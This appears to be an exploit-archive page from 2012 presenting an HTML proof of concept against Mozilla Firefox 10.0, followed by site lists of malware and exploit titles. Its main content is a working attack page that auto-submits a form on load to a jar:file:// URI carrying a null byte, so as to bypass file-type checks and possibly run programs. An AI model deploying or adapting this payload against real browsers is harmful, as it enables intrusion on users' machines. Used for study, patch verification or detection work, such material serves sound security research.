Mozilla Firefox 10.0 Local Null Byte Bypass File Check Execu

Posted on 09 February 2012

<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->
<!-- -->
<!-- Vuln risk level: Medium -->
<!-- Author: Todor Donev -->
<!-- Author mail: todor.donev@@gmail.com -->
<!-- -->
<!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->
<!-- URI with a dangerous extension.-->
<!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more -->
<!-- -->
<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->
<!-- -->
<!-- Greetz Tsvetelina Emirska again.. =) -->
<!-- -->
<html>
<body onLoad=javascript:document.form.submit()>
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">
</form>
</body>
</html>
<!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

User Registration And Management System 3.2 SQL Injection
Bagisto 2.1.2 Client-Side Template Injection
Backdoor.Win32.Plugx MVID-2024-0686 Insecure Permissions
Microweber 2.0.15 Cross Site Scripting
Apache OFBiz Forgot Password Directory Traversal

Last 20